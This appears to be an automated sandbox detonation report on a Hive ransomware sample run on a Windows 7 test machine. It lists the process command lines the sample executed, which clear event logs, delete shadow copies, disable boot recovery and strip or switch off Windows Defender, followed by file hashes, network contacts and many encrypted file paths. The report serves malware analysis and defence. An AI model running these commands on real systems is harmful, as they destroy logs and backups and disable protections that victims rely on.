C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.8.19:443 N/A tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fe58cf0a724a75cd8b670b1a45ff3373
SHA1 f7399d078a2f6e9681ab009d95bf7951d89e2058
SHA256 232835ad6008f18ceff265489e29fc3d15edd76fa4254f0e6fec96f3ddb5c245
SHA512 193fcc18f42a1750290877da4529f4b76f91eda19063650b3d62a3716e09f9b69b391be429b853847bdfa872f3fd9d9ab6ef340e911f492c271531bf09da4dea

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:30

Reported

2022-01-12 16:36

Platform

win7-en-20211208

Max time kernel

153s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\HideConvert.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\RepairTest.crw => C:\Users\Admin\Pictures\RepairTest.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\RepairTest.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\SuspendSkip.tif => C:\Users\Admin\Pictures\SuspendSkip.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\MountDisable.crw => C:\Users\Admin\Pictures\MountDisable.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\UnlockSubmit.png => C:\Users\Admin\Pictures\UnlockSubmit.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\InstallRequest.png => C:\Users\Admin\Pictures\InstallRequest.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\MountDisable.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitLimit.tiff => C:\Users\Admin\Pictures\SubmitLimit.tiff.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitLimit.tiff.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\SuspendSkip.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File renamed C:\Users\Admin\Pictures\HideConvert.tif => C:\Users\Admin\Pictures\HideConvert.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\InstallRequest.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnlockSubmit.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15184_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\wmpnssci.dll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\mip.exe.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\wbzc_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00586_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00808_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285410.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14582_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\wbzc_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\wbzc_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime.css.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_over.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VSTO\wbzc_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\DELETE.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\settings.html C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_OFF.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityMergeLetter.Dotx.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099171.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT_COL.HXC.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewFrame.html.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01292_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\msaccess.exe.manifest.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.HTM.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\css\settings.css C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099163.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\js\init.js C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\PSCONFIG.CHM.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Minesweeper\de-DE\Minesweeper.exe.mui.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
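
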